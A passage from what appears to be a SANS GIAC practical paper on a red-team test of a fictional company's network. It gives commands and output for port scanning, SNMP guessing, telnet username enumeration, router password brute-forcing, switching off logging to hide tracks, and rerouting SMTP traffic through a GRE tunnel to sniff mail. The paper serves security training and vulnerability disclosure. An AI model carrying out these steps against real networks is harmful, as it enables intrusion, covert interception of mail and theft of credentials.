transfers.  Had a zone transfer been successful, the red team would have been able todiscover additional information about the GIAC Enterprises including server names through Arecords, netblocks numbers through PTR records, and additional name servers through NSrecords.C7.  Determine if hosts behind the firewall are masqueraded through network address translationservices.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 21 of 49Tool Used: PerlCommands Typed: “perl referrer-addr.pl https.giace.com”Output Received:linux $ perl referrer-addr.pl https.giace.comHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: https://3.3.3.6/Default.htmDate: Mon, 10 Sep 2001 13:01:21 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Fri, 29 Jun 2001 11:41:12 GMTETag: "493b7c65900c11:a10"<snip>linux $Originally reported to the BUGTRAQ mailing list on August 8, 2001 by Marek Roy ofGGS/AU, IIS web servers are vulnerable to reporting their internal IP address when respondingto a HTTPS GET request for HTTP/1.0 services (Roy).  I put together a quick Perl scriptincluded in Appendix B to gather and report this information.From this output, we can determine that the HTTPS server has an inside address of 3.3.3.6,matching the outside address.  The firewall between the 1.1.1.2 Cisco router and the HTTPSserver is not performing NAT to inbound requests, which probably holds true for other insideservices as well.C8.  Identify if the firewall is modern and capable of maintaining session state information.Tools Used: hpingCommands Typed: “hping www.giace.com -S –c 1 –p 139”, “hping www.giace.com –S–A –c 1 –p 139”, “hping www.giace.com –S –A –c 1 –p 135”Output Received:linux # hping 3.3.3.5 -S -p 139 -c 1eth0 default routing interface selected (according to /proc)HPING 3.3.3.5 (eth0 3.3.3.5): S set, 40 headers + 0 data bytes--- 3.3.3.5 hping statistic ---1 packets tramitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 mslinux # hping 3.3.3.5 -S -A -p 139 -c 1eth0 default routing interface selected (according to /proc)HPING 3.3.3.5 (eth0 3.3.3.5): SA set, 40 headers + 0 data bytes--- 3.3.3.5 hping statistic ---1 packets tramitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 mslinux # hping 3.3.3.5 -S -A -p 135 -c 1eth0 default routing interface selected (according to /proc)HPING 3.3.3.5 (eth0 3.3.3.5): SA set, 40 headers + 0 data bytes
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 22 of 49--- 3.3.3.5 hping statistic ---1 packets tramitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 mslinux #Many legacy packet filtering devices and even some firewalls are vulnerable to a SYN/ACKscan to bypass simple filters.  If a packet filtering device permits traffic to pass through thefirewall if it is part of an already-established connection, we can determine if it is rejecting trafficwith only the SYN flag set while passing traffic with SYN/ACK, or if it is maintaining stateinformation for each session.The first command above gives us an expected output of no response, as we know TCP port 139is not permitted through the firewall to this host.  We simply alter the “hping” command to alsoset the ACK flag in the TCP header and send the packet again.  Again, we do not get a responsefrom the host.  A third attempt with the same SYN/ACK flag to a different port gives us the sameresults.From this output, we can determine that the firewall is a modern one, capable of maintainingsession state information and not easily fooled by reconstructing the TCP header to look like anestablished connection.Attacking/Vulnerability TestingAt this point, we know several pieces of information regarding the target network.  We havediscovered what we believe is a modern packet-filtering firewall that is capable of maintainingsession state information (C8).  We have discovered an edge device that is not protected by thefirewall, as well as 5 servers, each providing a single resource as permitted by the firewall (A1,B1, C3, C4).While other attack scenarios may exist against this network security implementation, we will betargeting the edge router as a method to create a “foothold” within the network.D1.  Perform an exhaustive port scan on the edge router 1.1.1.2 to learn about all ports active onthe resource.Tools Used: nmap, netcatCommands Typed: “nmap –v –sS –p1-65535 –P0 –O 1.1.1.2”, “nc –v –v –w 4 –z –u1.1.1.2 1-1024”Output Received:linux $ nmap –v –sS –p1-65535 –P0 –O 1.1.1.2Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Host  (1.1.1.2) appears to be up ... good.Initiating SYN Stealth Scan against  (1.1.1.2)Adding TCP port 23 (state open).
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 23 of 49Adding TCP port 79 (state open).Adding TCP port 80 (state open).The SYN Stealth Scan took 225 seconds to scan 65535 ports.For OSScan assuming that port 23 is open and port 1 is closed and neither arefirewalledInteresting ports on  (1.1.1.2):(The 65532 ports scanned but not shown below are in state: closed)Port       State       Service23/tcp     open        telnet79/tcp     open        finger80/tcp     open        httpTCP Sequence Prediction: Class=random positive increments                         Difficulty=95275 (Worthy challenge)Sequence numbers: 430DD120 430EB8B6 43123ACC 4316CF1F 4317B8CF 431AA70ARemote OS guesses: AS5200, Cisco 2501/5260/5300 terminal server IOS 11.3.6(T1), CiscoIOS 11.3 - 12.0(11)Nmap run completed -- 1 IP address (1 host up) scanned in 126 secondsI prefer to use netcat for UDP scans:linux $ nc –v –v –w 4 –z –u 1.1.1.2 1-10241.1.1.2: inverse host lookup failed: Unknown host(UNKNOWN) [1.1.1.2] 1024 (?) : Connection refused(UNKNOWN) [1.1.1.2] 1023 (?) : Connection refused<snip>(UNKNOWN) [1.1.1.2] 179 (?) : Connection refused(UNKNOWN) [1.1.1.2] 178 (?) : Connection refused(UNKNOWN) [1.1.1.2] 177 (?) open(UNKNOWN) [1.1.1.2] 176 (?) : Connection refused(UNKNOWN) [1.1.1.2] 175 (?) : Connection refused<snip>(UNKNOWN) [1.1.1.2] 163 (?) : Connection refused(UNKNOWN) [1.1.1.2] 162 (?) : Connection refused(UNKNOWN) [1.1.1.2] 161 (?) open(UNKNOWN) [1.1.1.2] 160 (?) : Connection refused(UNKNOWN) [1.1.1.2] 159 (?) : Connection refused<snip>(UNKNOWN) [1.1.1.2] 125 (?) : Connection refused(UNKNOWN) [1.1.1.2] 124 (?) : Connection refused(UNKNOWN) [1.1.1.2] 123 (ntp) open(UNKNOWN) [1.1.1.2] 122 (?) : Connection refused<snip>(UNKNOWN) [1.1.1.2] 69 (tftp) : Connection refused(UNKNOWN) [1.1.1.2] 68 (bootpc) : Connection refused(UNKNOWN) [1.1.1.2] 67 (bootps) open(UNKNOWN) [1.1.1.2] 66 (?) : Connection refused(UNKNOWN) [1.1.1.2] 65 (?) : Connection refused<snip>(UNKNOWN) [1.1.1.2] 2 (?) : Connection refused(UNKNOWN) [1.1.1.2] 1 (?) : Connection refused sent 0, rcvd 0linux $The first nmap session run against the 1.1.1.2 target will disclose all the open TCP ports on thehost.  This is a more complete scan than just those services listed in the nmap-services file(utilized with the –F flag).  The –O option used with this command will also perform OSidentification tests, which provided the output “Remote OS Guesses: AS5200, Cisco
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 24 of 492501/5260/5300 terminal server IOS 11.3.6(T1), Cisco IOS 11.3 - 12.0(11)”.  The –v flag turnson verbosity and makes nmap report the IP sequence number predictability statistic withsequence numbers.The second scan using netcat reports any open UDP ports on the target host.  This is particularlyuseful information to us as it also indicates the existence of xdmcp (177), snmp, ntp and bootpsservices on the router.  These services are typical of a Cisco router with a default configuration,permitting X Windows Display Manager Control Protocol, network management, timesynchronization and DHCP/BOOTP forwarding traffic on the router.D2.  Attempt to access the SNMP service by guessing common community names.Tools Used: admsnmpCommands Typed: “./ADMsnmp 1.1.1.2 –wor snmp.passwd –sleep 1”Output Received:linux $ ./ADMsnmp 1.1.1.2 –wor snmp.passwd –sleep 1ADMsnmp vbeta 0.1 (c) The ADM crewftp://ADM.isp.at/ADM/greets: !ADM, el8.org, ansia>>>>>>>>>>> get req name=access  id = 2 >>>>>>>>>>>>>>>>>>>>>> get req name=admin  id = 5 >>>>>>>>>>>>>>>>>>>>>> get req name=all private  id = 8 >>>>>>>>>>>>>>>>>>>>>> get req name=cisco  id = 11 >>>>>>>>>>>>>>>>>>>>>> get req name=community  id = 14 >>>>>>>>>>>>>>>>>>>>>> get req name=default  id = 17 >>>>>>>>>>>>>>>>>>>>>> get req name=enable  id = 20 >>>>>>>>>>>>>>>>>>>>>> get req name=gate  id = 23 >>>>>>>>>>>>>>>>>>>>>> get req name=gateway  id = 26 >>>>>>>>>>>>>>>>>>>>>> get req name=guest  id = 29 >>>>>>>>>>>>>>>>>>>>>> get req name=look  id = 32 >>>>>>>>>>>>>>>>>>>>>> get req name=manager  id = 35 >>>>>>>>>>>>>>>>>>>>>> get req name=monitor  id = 38 >>>>>>>>>>>>>>>>>>>>>> get req name=openview  id = 41 >>>>>>>>>>>>>>>>>>>>>> get req name=OrigEquipMfr  id = 44 >>>>>>>>>>>>>>>>>>>>>> get req name=password  id = 47 >>>>>>>>>>>>>>>>>>>>>> get req name=private  id = 50 >>>>>>>>>>>>>>>>>>>>>> get req name= private  id = 53 >>>>>>>>>>>>>>>>>>>>>> get req name=proxy  id = 56 >>>>>>>>>>>>>>>>>>>>>> get req name=public  id = 59 >>>>>>>>>>>>>>>>>>>>>> get req name=root  id = 62 >>>>>>>>>>>>>>>>>>>>>> get req name=router  id = 65 >>>>>>>>>>>>>>>>>>>>>> get req name=Secret C0de  id = 68 >>>>>>>>>>>>>>>>>>>>>> get req name=security  id = 71 >>>>>>>>>>>>>>>>>>>>>> get req name=snmp  id = 74 >>>>>>>>>>>>>>>>>>>>>> get req name=snmpd  id = 77 >>>>>>>>>>>>>>>>>>>>>> get req name=system  id = 80 >>>>>>>>>>>>>>>>>>>>>> get req name=test  id = 83 >>>>>>>>>>>>>>>>>>>>>> get req name=testing  id = 86 >>>>>>>>>>>>>>>>>>>>>> get req name=tivoli  id = 89 >>>>>>>>>>>>>>>>>>>>>> get req name=write  id = 92 >>>>>>>>>>>>>>>>>>>>>> get req name=ilmi  id = 95 >>>>>>>>>>>>>>>>>>>>>> get req name=cable-docsis  id = 98 >>>>>>>>>>><!ADM!>snmp check on 1.1.1.2<!ADM!>
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 25 of 49linux $SNMP services are often overlooked when securing hosts and other networking resources.  Manyadmins will overlook UDP port scans, opting to rely on TCP scans alone.  Using the snmpset andsnmpget tools provided in the Net-SNMP toolkit (formerly UCD-SNMP), we can determine atremendous amount of information about the edge router device.  Using a script like one Ideveloped, included in Appendix C, we can use read/write SNMP access to download a copy ofthe router configuration to a TFTP server we specify.GIAC Enterprises followed the Visa “Ten Commandments”, so a quick scan for common SNMPcommunity strings will fail due to their compliance with Visa Commandment number 8 (Do notuse vendor-supplied defaults for system passwords and other security parameters).  The SNMPservice would be susceptible to a dictionary attack, but we cannot be certain if read/write or justread access has been permitted in the device configuration.  For this reason, we will not pursuethe SNMP attack option.D3.  Try to exploit the Cisco IOS HTTP vulnerability.Tools Used: PerlCommands Typed: “perl ioshttpvul.pl 1.1.1.2”Output Received:linux $ perl ioshttpvul.pl 1.1.1.2Connecting to device 1.1.1.2 port 80 ... System is not vulnerable.linux $A recent security flaw discovered on the Cisco IOS HTTP server was an access validation errorthat permitted anyone to get level 15 access (supervisor) on the router through the HTTPinterface.Since GIAC Enterprises followed the Visa “Ten Commandments”, this attack will also fail, aspatches were made available from Cisco to resolve this issue shortly after it was announced onthe BUGTRAQ mailing list (Visa “Commandment” number 2: Do not use vendor-supplieddefaults for system passwords and other security parameters).  I have included the Perl script Iused to check for this vulnerability in Appendix D.D4.  Try to enumerate a valid username on the router.Tools Used: telnetCommand Typed: “telnet 1.1.1.2 23”Output Received: listed belowWe learned that the telnet service was running on the 1.1.1.2 device in step C3, then made areasonable assumption that the device was a Cisco router through banner grabbing in step C5,
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 26 of 49and discovered possible IOS revision levels through OS identification in step D1.  In myresearch, I have discovered a few flaws within the Cisco IOS telnet implementation that reducesthe overall security of the device.  All of the identified IOS issues were tested against Cisco IOS12.1.6 with the IP Only feature set on a Cisco 7206VXR router.IOS Flaw 1.  It is possible to identify usernames that are present on the remote device byguessing usernames.  It is not necessary to have a valid password to determine if ausername is present on the system.When we performed banner grabbing in step B7, we were able to determine that the router wasconfigured to not use the default “password only” authentication method, but to instead requestboth a username and a password.  Since Stuckless designed this implementation to meet the Visa“Ten Commandments”, the router was configured such that every user had a unique usernameand password instead of using a shared account (Visa Commandments number 8: Do not usevendor-supplied defaults for system passwords and other security parameters.).Using the telnet tool, we can connect to the router and guess at valid usernames on the system.Using the information gathered in the reconnaissance stage, we can surmise a probable list ofusers who may have access to the system.  This short list includes technical staff the red teammet before the assessment, those names discovered as technical or administrative contacts in thewhois domain name lookup and names discovered as technical staff through searching Usenetnewsgroups.linux $ telnet 1.1.1.2Trying 1.1.1.2...Connected to 1.1.1.2.Escape character is '^]'.User Access VerificationUsername: john% Login invalidUsername: doe% Login invalidUsername: jdoe% Login invalidConnection closed by foreign host.linux $linux $ telnet 1.1.1.2Trying 1.1.1.2...Connected to 1.1.1.2.Escape character is '^]'.User Access VerificationUsername: james% Login invalidUsername: donovan% Login invalid
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 27 of 49Username: jdonovanPassword: ^]telnet> closelinux $Because the telnet service returns “Password:” when we try the username “jdonovan”, we knowthe jdonovan account is valid on the router.D5.  With a valid username, attempt to brute-force the password of the user to gain access to theCisco router.Tools Used: cistelbf.plCommand Typed: “perl cistelbf.pl 1.1.1.2 23 ./dict jdonovan”Output Received:linux $ perl cistelbf.pl 1.1.1.2 23 ./dict ddonovan......................................................................................<remainder of obnoxious dots deleted>Look what I found.. giac-edge-router#Host: 1.1.1.2:23Username: ddonovanPassword: d1ff1cultStats:    Socket connections: 368047    Password guesses  : 1104140    Duration          : 13 hours, 4 minutes, 15 seconds.linux $With valid username in hand, it is possible to brute-force the account to gain access to the router.This is simplified through additional flaws I have discovered within Cisco IOS.IOS Flaw 2.  The telnet service only permits three username/password attempts beforedisconnecting the socket connection, but does not interject any delay between guesses.IOS Flaw 3.  The telnet service does not interject a delay when creating a socketconnection before asking for authentication information.  This permits the attacker tospawn connection attempts limited only by the bandwidth of the connection.IOS Flaw 4.  There are no logging options present in Cisco IOS to indicate the presenceof multiple failed username guesses, nor the logging of multiple failed password guesses.I have put together a demonstrative tool, supplied in Appendix E, which abuses these flaws tobrute-force the password of a known username.  The tool accepts the IP address of the router, theport to connect to, a dictionary of words/characters to guess with, and a valid username on thesystem.  The script creates sequential socket connections and attempts to login with the knownusername and three words read from the dictionary file (three password per socket connection).
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 28 of 49In my testing, I was able to send approximately 1450 password attempts per minute.  Testingwith the dictionary that ships with Sun Solaris 8 (/usr/dict/words), the script completed 25144password guesses in 19 minutes, 23 seconds against a Cisco 7206VXR with NSE-1 on a low-latency network connection.In this kind of a test, time is the ally of the red team.  Since there is no logging option availableto alert an administrator to this type of attack with internally configured usernames on the router,the red team can continue this attack until the password of the username is discovered.  In mytesting, I merged several dictionary files available to download fromftp://ftp.ox.ac.uk/pub/wordlists (“cat file1 file2 file3 >out”).  After assembling the893,551 word dictionary, I created a hybrid dictionary, replacing all the i’s with 1’s, e’s with 3’sand o’s with 0’s (a common technique used when setting “difficult” passwords).  The resultingdictionary was 4,467,755 words.At a rate of 1,450 passwords per minute, I was able to attempt all 4,467,755 words in a little overtwo days (approximately 52 hours).  For the purposes of demonstration, we are going to assumethat a password was successfully discovered against the router, and the red team is able to loginto the device.It is important to note that while the cistelbf.pl script is running, a network administrator wouldbe unable to gain access to the device through the telnet interface.  The probability of thishappening increases as the script runs for a longer duration, certainly causing the administrator tobecome suspicious of the traffic causing this to happen.D6.  Utilize the router access as a foothold in the network to discover additional informationabout the systems beyond.Tools Used: Commands available within Cisco IOSCommands Typed: BelowOutput Received: BelowOnce access is gained to the edge router, the red team can utilize various Cisco IOS “show”commands to learn additional information about the systems within the network.CommandOutput1sh cdpneighborgiace-edge-router>sh cdp neighborCapability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge                  S - Switch, H - Host, I - IGMP, r - RepeaterDevice ID        Local Intrfce     Holdtme    Capability  Platform  PortIDswitch1 Fas 0/0            158         T S       WS-C3512-XFas 0/32sh iproutegiace-edge-router>sh ip routeCodes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP       i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-ISinter area       * - candidate default, U - per-user static route, o - ODR       P - periodic downloaded static route
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 29 of 49Gateway of last resort is 0.0.0.0 to network 0.0.0.0     1.0.0.0/8 is variably subnetted, 4 subnets, 2 masksC       1.1.1.0/24 is directly connected, FastEthernet1/1C       205.179.30.114/30 is directly connected, s0/1.102S*   0.0.0.0/0 [1/0] via s0/1.1023sh adjgiace-edge-router>sh adjProtocol Interface                 AddressIP       FastEthernet1/1           ftp.giace.com(5) (3.3.3.4)IP       FastEthernet1/1           www.giace.com(5) (3.3.3.5)IP       FastEthernet1/1           https.giace.com(5) (3.3.3.6)IP       FastEthernet1/1           dns.giace.com(5) (3.3.3.7)IP       FastEthernet1/1           smtp.giace.com(5) (3.3.3.8)IP       FastEthernet1/1           wa-dc-01.giace.com(5) (2.2.2.1)4sh snmpgiace-edge-router>sh snmpChassis: SAD044400FV132299 SNMP packets input    0 Bad SNMP version errors    128229 Unknown community name    0 Illegal operation for community name supplied    42 Encoding errors    3990 Number of requested variables    33 Number of altered variables    502 Get-request PDUs    3492 Get-next PDUs    34 Set-request PDUs4028 SNMP packets output    0 Too big errors (Maximum packet size 1500)    5 No such name errors    0 Bad values errors    0 General errors    4028 Response PDUs    0 Trap PDUsSNMP logging: disabled5sh iparpgiace-edge-router>sh ip arpProtocol  Address         Age (min)  Hardware Addr   Type   InterfaceInternet  1.1.1.1          0    0003.e3e5.3dc7  ARPA   FastEthernet0/0Internet  1.1.1.2          0    0003.e3e5.3ddf  ARPA   FastEthernet0/06sh usersgiace-edge-router>sh users    Line       User       Host(s)              Idle       Location*  3 vty 1     ddonovan       idle                 00:00:00138.91.123.101  Interface  User      Mode                     Idle Peer Address7sh vergiac-edge-router>sh verCisco Internetwork Operating System SoftwareIOS (tm) 7200 Software (C7200-IS-M), Version 12.1(6)Copyright (c) 1986-2000 by cisco Systems, Inc.Compiled Thu 26-Oct-00 16:11 by eaarmasImage text-base: 0x60008950, data-base: 0x6109E000ROM: System Bootstrap, Version 12.0(20000211:194150) [dperez-cosmos_e_ecc106], DEVELOPMENT SOFTWAREBOOTFLASH: 7200 Software (C7200-BOOT-M), Version 12.0(13)S, EARLYDEPLOYMENT RELEASE SOFTWARE (fc1)giac-edge-router uptime is 27 weeks, 6 days, 4 hours, 36 minutesSystem returned to ROM by power-onSystem restarted at 16:39:40 UTC Wed Feb 28 2001System image file is "sup-slot0:/c7200-is-mz.121-3a.E5"cisco 7206VXR (NSE-1) processor (revision A) with 114688K/16384K bytes ofmemory.Processor board ID 21299019R7000 CPU at 262Mhz, Implementation 39, Rev 2.1, 256KB L2, 2000KB L3Cache6 slot VXR midplane, Version 2.1
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 30 of 49Last reset from power-onBridging software.X.25 software, Version 3.0.0.PXF processor tmc is running.1 FastEthernet/IEEE 802.3 interface(s)1 ATM network interface(s)125K bytes of non-volatile configuration memory.46976K bytes of ATA PCMCIA card at slot 0 (Sector size 512 bytes).4096K bytes of Flash internal SIMM (Sector size 256K).Configuration register is 0x102Based on this information, the red team discovered the names of several servers, whichreinforced the assumption that the organization utilizes Windows NT servers for clientauthentication (learned in A4) through DNS names in use (the fragment “DC” in a hostnametypically indicates a domain controller).  We have also discovered the MAC and IP address ofwhat we assume is the firewall, the configuration and utilization of access lists on the router, theversion of IOS code, and which logging services have been configured on the device.  All thesecommands are entered and access is gained to the router without generating any logging entries.For illustrative purposes, we assume that the username/password access gained in step C4 waslevel 15 privilege (administrator) on the router.  This would be the case in an organization thatimplements the Visa “Ten Commandments”, as a shared enable or secret password on the routerwould violate Commandment 7 (Assign a unique ID to each person with computer access todata).  However, if the access level were that of a non-privileged user, the red team would still beable to gather the same output from the commands listed above.  While not listed as availablewith the IOS “help” or “?” commands, they are available to the least-privileged default user.With this output, the red team could gather enough information to attack other system usernamesor other resources (SNMP) to escalate system privilege.D7.  Disable logging facilities on the Cisco router to cover our tracks.Tools Used:  Commands available within Cisco IOSCommands Typed: “conf terminal”, “no logging 2.2.2.4”, “exit”.Output Received:giac-edge-router#conf terminalEnter configuration commands, one per line.  End with CNTL/Z.giac-edge-router (config)#no logging 2.2.2.4giac-edge-router (config)#exitgiac-edge-router#I believe this problem is a fifth flaw within Cisco IOS.IOS Flaw 5.  A logging message is created when an administrator leaves configurationmode, not when they enter configuration mode.  Thus, it is possible to turn off all loggingservices without generating a message indicating that a user entered configuration mode.A security-conscious administrator may utilize the option to deliver Cisco logging message to aremote syslog server for monitoring and analysis.  However, if an intruder can gain access to the
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 31 of 49IOS device, they can determine if logging to a remote syslog server is enabled on the device (“shlogging”, “sh run”), enter configuration mode and disable logging without generating a logmessage.I have documented these flaws/shortcomings and sent a letter to the Cisco Security team atpsirt@cisco.com documenting my findings.  I have included a copy of this letter in Appendix F.Unfortunately, Cisco responded only with an initial “We’ll get back to you” e-mail, and did notrespond to subsequent status requests.D8.  Reroute selected traffic to red team site to perform packet-sniffing analysis.Tools Used:  Commands available within Cisco IOSCommands Typed: BelowOutput Received: BelowWith level 15 privileges on the GIAC Enterprises edge Internet router, we can stage a packetsniffing attack against traffic leaving the network.  After establishing a tunneled connectionbetween the compromised router and the red team Cisco 2514 router, we can redirect selectedtraffic to the red team Cisco 2514 before forwarding to its intended destination.Using the features of the GIAC Cisco edge router, we can carefully construct an access list toonly forward the traffic we are interested in to the red team site.  The selection criteria canconsist of any layer 3 address (source or destination); any layer 4 port (source or destination);and even upper layer criteria through the use of Cisco NBAR (network-based applicationrecognition).giac-edge-router#conf tEnter configuration commands, one per line.  End with CNTL/Z.giac-edge-router(config)#int tunnel0giac-edge-router(config-if)#ip address 192.168.1.1 255.255.255.0giac-edge-router(config-if)#tunnel source fa1/1giac-edge-router(config-if)#tunnel dest 138.91.123.101giac-edge-router(config-if)#tunnel mode gre ipgiac-edge-router(config-if)#exitgiac-edge-router(config)#exitgiac-edge-router#redteam-2514#conf tEnter configuration commands, one per line.  End with CNTL/Z.redteam-2514(config)#int tunnel0redteam-2514(config-if)#ip address 192.168.1.2 255.255.255.0redteam-2514(config-if)#tunnel source e0redteam-2514(config-if)#tunnel dest 205.179.20.114redteam-2514(config-if)#tunnel mode gre ipredteam-2514(config-if)#exitredteam-2514(config)#exitredteam-2514#giac-edge-router#conf tEnter configuration commands, one per line.  End with CNTL/Z.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 32 of 49giac-edge-router(config)#access-list 100 permit tcp any any eq 25giac-edge-router(config)#route-map smtp-redirectgiac-edge-router(config-route-map)#match ip address 100giac-edge-router(config-route-map)#set ip next-hop 192.168.1.2giac-edge-router(config-route-map)#int s0/1.102giac-edge-router(config-if)#ip policy route-map smtp-redirectgiac-edge-router(config-if)#exitgiac-edge-router(config)#exitgiac-edge-router#With the use of Cisco IOS extended access lists, we can create an access-list on the GIAC edgerouter that permits only the traffic we specify (in this case SMTP) to a specified destination withthe route-map command.  This is very similar to the attack technique described by gaius(gaius@hert.org), first published in the Phrack 56 article “Things To Do In Cisco Land WhenYou Are Dead” (Gaius).A few notes regarding this attack pattern:1. The routing of selected traffic in the method described above will create anasymmetric route.  The red team will only be able to see traffic from the GIACEnterprises site to the destination, and will not see any traffic in response.  This mayfoil password sniffing applications such as dsniff that perform pattern matching forcleartext passwords (e.g. watch for port 23 string “Password:” and capture text thatfollows).  The asymmetric nature of this traffic also prevents the red team fromstaging man-in-the-middle style attacks.2. By re-routing only selected TCP port traffic, an administrator would be unable todiscover the routing change without performing some detailed traffic analysis (orchecking the configuration on the GIAC Enterprises edge router).  A traceroute willmap the path from source to destination without indicating the changed route asICMP and UDP traffic are not redirected.3. It is possible to discover a tremendous amount of information about the clients andservers behind the firewall, including what operating systems are in use.  LanceSpitzner described such a passive OS detection scenario in his paper “Know YourEnemy: Passive Fingerprinting” (Spitzner).  By utilizing the techniques described inhis paper, the red team can discover the operating systems in use by clients andservers behind the firewall.4. The red team can also expand their knowledge about the firewall ruleset by watchingthe traffic that is permitted to pass through the firewall.  In this way, we will discoveradditional rules regarding ingress and egress filters.For the purposes of this paper, the red team discovers that clients behind the firewall are runningWindows 95 or Windows 98.  They also discover that all, or nearly all, traffic is permitted totraverse the firewall from the inside interface to the outside interface.D9.  Reassemble outgoing SMTP traffic for easy viewing.Tool Used: mailsnarf tool from the dsniff packageCommands Typed: “mailsnarf| grep X-Mailer”
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 33 of 49Output Received:linux $ mailsnarf|grep X-Mailermailsnarf: listening on eth0X-Mailer: Microsoft Outlook, Build 10.0.2627X-Mailer: QUALCOMM Windows Eudora Version 4.0X-Mailer: Internet Mail Service (5.5.2653.19)X-Mailer: Microsoft Outlook Express 5.50.4133.2400X-Mailer: Internet Mail Service (5.5.2653.19)X-Mailer: Microsoft Outlook Express 5.00.2919.6600X-Mailer: Microsoft Outlook Express 5.00.2919.6600X-Mailer: Microsoft Outlook Express 4.72.3110.1X-Mailer: Microsoft Outlook, Build 10.0.2627X-Mailer: Microsoft Outlook Express 5.50.4133.2400^Clinux $Using the mailsnarf tool, the red team is able to easily reassemble the outgoing mail from theGIAC Enterprises SMTP server.  This will be printed, and presented to the customer at a latertime to prove that email was intercepted.  If this information is encrypted with the GnuPG toolthat we discovered was in use in A6, the red team will be unable to read the messages.  However,the red team will still be able to determine the type of mail client in use by examining the X-Mailer: header information that is presented in the mailsnarf output.For the purposes of this document, the red team will learn that the email software in use byclients behind the firewall include Microsoft Outlook Express, Microsoft Outlook, QualcommEudora and Microsoft Exchange Server 5.5 (Internet Mail Service).D10.  Discover the username and password of selected users through NetBIOS cached passworddiscovery.Tools Used: Unix mail client, L0pht crackCommands Typed: BelowOutput Received: BelowA vulnerability first reported to the Windows 2000 Security mailing list by Eric Hacker ofLucent Netcare made it possible to abuse the authentication method used by Windows clientswhen accessing UNC file paths (Hacker).  When requesting a resource shared by a UNC path, aWindows client will freely pass its cached credentials to the destination.  This vulnerability iseven more dangerous when combined with the knowledge that several Windows applicationswill respond to an HTML file:// request containing a UNC path (e.g.file://\\C.C.C.C\shared\filename.jpg).  As Hacker pointed out in his vulnerability report, the listof applications vulnerable to this include Microsoft Word 97/2000, 